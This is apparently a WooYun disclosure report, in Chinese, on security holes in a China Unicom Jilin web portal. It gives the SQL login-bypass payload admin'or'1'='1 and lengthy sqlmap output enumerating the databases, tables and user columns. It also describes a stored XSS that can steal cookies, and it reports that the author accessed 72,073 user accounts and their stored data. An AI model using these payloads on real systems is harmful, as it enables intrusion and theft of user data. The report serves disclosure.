WooYun.org

身份：中国联合网络通信有限公司 吉林省分公司
域名：www.m10060.com
有图有真相：

按照等级排序先总结下发现的问题：
问题一：存在多处SQL注入漏洞，a'or'1'='1 万能密码登陆系统
问题二：短信珍藏模块存在一处存储型XSS漏洞，可以被利用盗取任意用户Cookie;
问题三：非授权访问目录和后台页面和源码泄露;
问题四：服务出错时，错误信息没有处理导致绝对路径暴露;
问题五：管理系统后台，没对用户信息模糊化，管理员可以直接查看任意用户帐号密码以及其他信息;
现在开始一个一个对这些问题进行描述和证明
问题一：
存在多处SQL注入漏洞，a'or'1'='1 万能密码登陆系统
万能密码登陆：admin'or'1'='1

登陆URL：第一个URL测试万能密码桡过：
http://www.m10060.com/common/manager/
进入管理后台：

72073个用户记录：

看用户没有模糊化的信息：

用户账号密码信息：

登陆用户账号：

到此证明了用户信息没模糊化，后台登陆被绕过导致72073个用户账号被泄露，并使用用户账号登陆操作用户存放在网络保管箱的数据：
http://www.m10060.com/common/phone/login.jsp
第二个URL是客户端打开的，在电脑上直接访问会跳转到首页的！
我是这样绕过的：
先抓包看：

知道原因后用Brupsuite自动代理在响应流里替换处理掉那段js代码

我很想知道这个是不是也没过滤呢？抓包用sqlmap测试于是：
数据库类型
DBMS: Microsoft SQL Server 2000
数据库
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] wo
[*] ymaildb
Database: wo
[4 tables]
+--------------------+
| dbo.UserOrder |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------+
数据库用户
database management system users [4]:
[*] BUILTIN\\Administrators
[*] sa
[*] wodb
[*] ymaildb
当前用户:
current user: 'ymaildb'
当前数据库：
current database: 'ymaildb'
当前数据库920多个表，列举了一部分表名：
"dbo.mz_msg"
"dbo.mz_dict"
"dbo.mz_content"
"dbo.mz_sendcycle"
"dbo.mz_friend"
"dbo.mz_item"
"dbo.mz_sendmsg"
"dbo.mz_msg_log"
"dbo.mz_sendlimit"
"dbo.mz_sendmsg_item"
"dbo.mz_sms_mo_log"
"dbo.mz_sms_mo_log_backup"
"dbo.mz_sms_mo"
"dbo.mz_seqinfo"
"dbo.mz_smsflow"
"dbo.mz_sendmsg_log"
"dbo.MZ_SMS_MT_LOG_BACKUP"
"dbo.mz_smsflow_conf"
"dbo.mz_smsflow_mt"
"dbo.mz_sms_mt"
"dbo.mz_sms_mt_log"
"dbo.mz_smsservice"
"dbo.mz_subitem_bak"
"dbo.mz_smsqcdz"
"dbo.mz_subuserreginfo"
"dbo.mz_td"
"dbo.mz_subuserreginfo_bak"
"dbo.mz_subitem"
"dbo.mz_unuserreginfo"
"dbo.mz_smsqcdz_new"
"dbo.mz_usersms"
"dbo.mz_temp"
"dbo.mz_useractinfo"
"dbo.mz_userreginfo"
"dbo.mz_workflow"
"dbo.mz_userstat"
"dbo.nmyj_not_billusers"
"dbo.temp_20130206_???????366?"
"dbo.temp_20130201_???????"
"dbo.temp_20130306_??G?"
"dbo.temp_20130319_????G???"
"dbo.temp_20130408_?????G???"
"dbo.temp_20130604_??????????(201209-201305)"
"dbo.temp_20130604_??????????(201209-201305)"
"dbo.temp_20130408_?????G???"
"dbo.temp_20130613_??????100?"
"dbo.temp_20130613_??????100?"
"dbo.temp_20130618_??6?????"
"dbo.temp_20130409_??G??????"
"dbo.temp_20130826_????6"
"dbo.temp_20130613_??5?????"
"dbo.temp_20130911_????"
"dbo.temp_20130911_????"
"dbo.temp_20130902_??8????????"
"dbo.temp_20131022_1133_ftp????"
"dbo.temp_20130922"
"dbo.temp_20131022_1133_??????"
"dbo.temp_20140604"
"dbo.temp_20131023_1125"
"dbo.temp_20131206_??"
"dbo.temp_20140328"
"dbo.temp_20140721_G"
"dbo.temp_lN_all"
"dbo.temp_20140721_0024"
"dbo.temp_6????????_20120710"
"dbo.temp_ln_as_20130922"
"dbo.temp_ln_20140326_g"
"dbo.temp_20140722_0415_201303"
"dbo.temp_20140722_0415G"
"dbo.temp_LN_PSTN_20120712"
"dbo.temp_ln201305???????"
"dbo.temp_ln_dl_20130922"
"dbo.temp_??_??_?????????"
"dbo.temp_????????_20110522"
"dbo.temp_??_??_??????"
"dbo.temp_??_????"
"dbo.temp_???????G?201206????"
"dbo.temp_????????201204"
"dbo.temp_????????201206?201204??"
"dbo.temp_??_??G??"
"dbo.trust_bath_interface"
"dbo.two"
"dbo.temp_????????201206"
"dbo.temp_??????267?_20110421"
"dbo.TY4YX_?????2?"
"dbo.user_lottery"
"dbo.userbaseinfo"
"dbo.undelive_20080630"
"dbo.undelive_20071227"
"dbo.usermailindex"
"dbo.TY2YX_??????"
"dbo.user_lot"
"dbo.usercalloutrecord"
"dbo.users"
"dbo.userreginfo"
"dbo.usermoney"
"dbo.undelive_20071202"
"dbo.users_20081220_bak"
"dbo.users_20080604"
"dbo.users_20081212"
"dbo.users_fee_success_200612"
"dbo.users_defined_message"
"dbo.users_fee_success"
"dbo.users_delmail_logs"
"dbo.users_fixed"
"dbo.users_action"
"dbo.users_itinerary_remind"
"dbo.users_bath_dredge_20080414"
"dbo.users_bak_20120329"
"dbo.users_initpwd_record"
"dbo.users_jl_cncself_20080710"
"dbo.users_jl_cncself"
"dbo.users_jl_taihua"
"dbo.users_ln_0427bill1"
"dbo.users_ln_0427new1users"
"dbo.users_ln_bath_11"
"dbo.users_ln_cncself"
"dbo.users_ln_cncself_024bill"
"dbo.users_ln_cncself_024bill2"
尝试读取某个表字段和数据，有点慢了就没等跑了
fetching columns for table 'users' in database 'ymaildb'
the SQL query used returns 42 entries
starting 10 threads
retrieved: "acct_id","decimal"
retrieved: "createdDate","varchar"
retrieved: "call_assistant","char"
retrieved: "addOldMail","int"
retrieved: "answer","varchar"
retrieved: "areacode","varchar"
retrieved: "curfaxn","int"
retrieved: "curmailn","int"
retrieved: "bath_dredge","char"
retrieved: "alias","varchar"
retrieved: "curmsgn","int"
retrieved: "curudisksize","int"
retrieved: "curSize","real"
retrieved: "forwardDestination","varchar"
retrieved: "domainName","varchar"
retrieved: "curvoicen","int"
retrieved: "grade","smallint"
retrieved: "mailDir","varchar"
retrieved: "itemCount","int"
retrieved: "logintimes","int"
retrieved: "lastLoginDate","varchar"
retrieved: "maxFaxTime","int"
retrieved: "popFirst","int"
retrieved: "ppwd","varchar"
retrieved: "reMailSign","varchar"
retrieved: "pwdAlgorithm","varchar"
retrieved: "pwdAlgorithm","varchar"
retrieved: "setDX","varchar"
retrieved: "pwdHash","varchar"
retrieved: "requestName","char"
retrieved: "state","smallint"
retrieved: "terminal_type","varchar"
retrieved: "type","char"
retrieved: "useAlias","smallint"
retrieved: "usedFaxTime","int"
retrieved: "user_type","varchar"
retrieved: "username","varchar"
retrieved: "useForwarding","smallint"
retrieved: "usercode","varchar"
retrieved: "userid","int"
retrieved: "whether_billing","int"
retrieved: "question","varchar"
fetching entries for table 'users' in database 'ymaildb'
fetching number of distinct values for column 'ppwd'
fetching number of distinct values for column 'type'
fetching number of distinct values for column 'alias'
fetching number of distinct values for column 'grade'
fetching number of distinct values for column 'setDX'
fetching number of distinct values for column 'state'
fetching number of distinct values for column 'answer'
fetching number of distinct values for column 'userid'
using column 'userid' as a pivot for retrieving row data
到此SQL注入漏洞已经证明了！
问题二：
短信珍藏模块存在一处存储型XSS漏洞，可以被利用盗取任意用户Cookie;
这个是在翻找目录文件下无意中测试出的

前面是这样的：

因为添加那个标签里有长度限制，编辑后抓包修改：

然后添加成功：

然后开短信珍藏模块：

一打开这个模块就弹出来了！！！！！
到此存储性XSS证明完毕！！
问题三：
非授权访问目录和后台页面和源码泄露;
直接上图：

问题四
服务出错时，错误信息没有处理导致绝对路径暴露;

手机客户端的截图：

大概就说这么多了！！现在是北京时间4点37分！好困。。。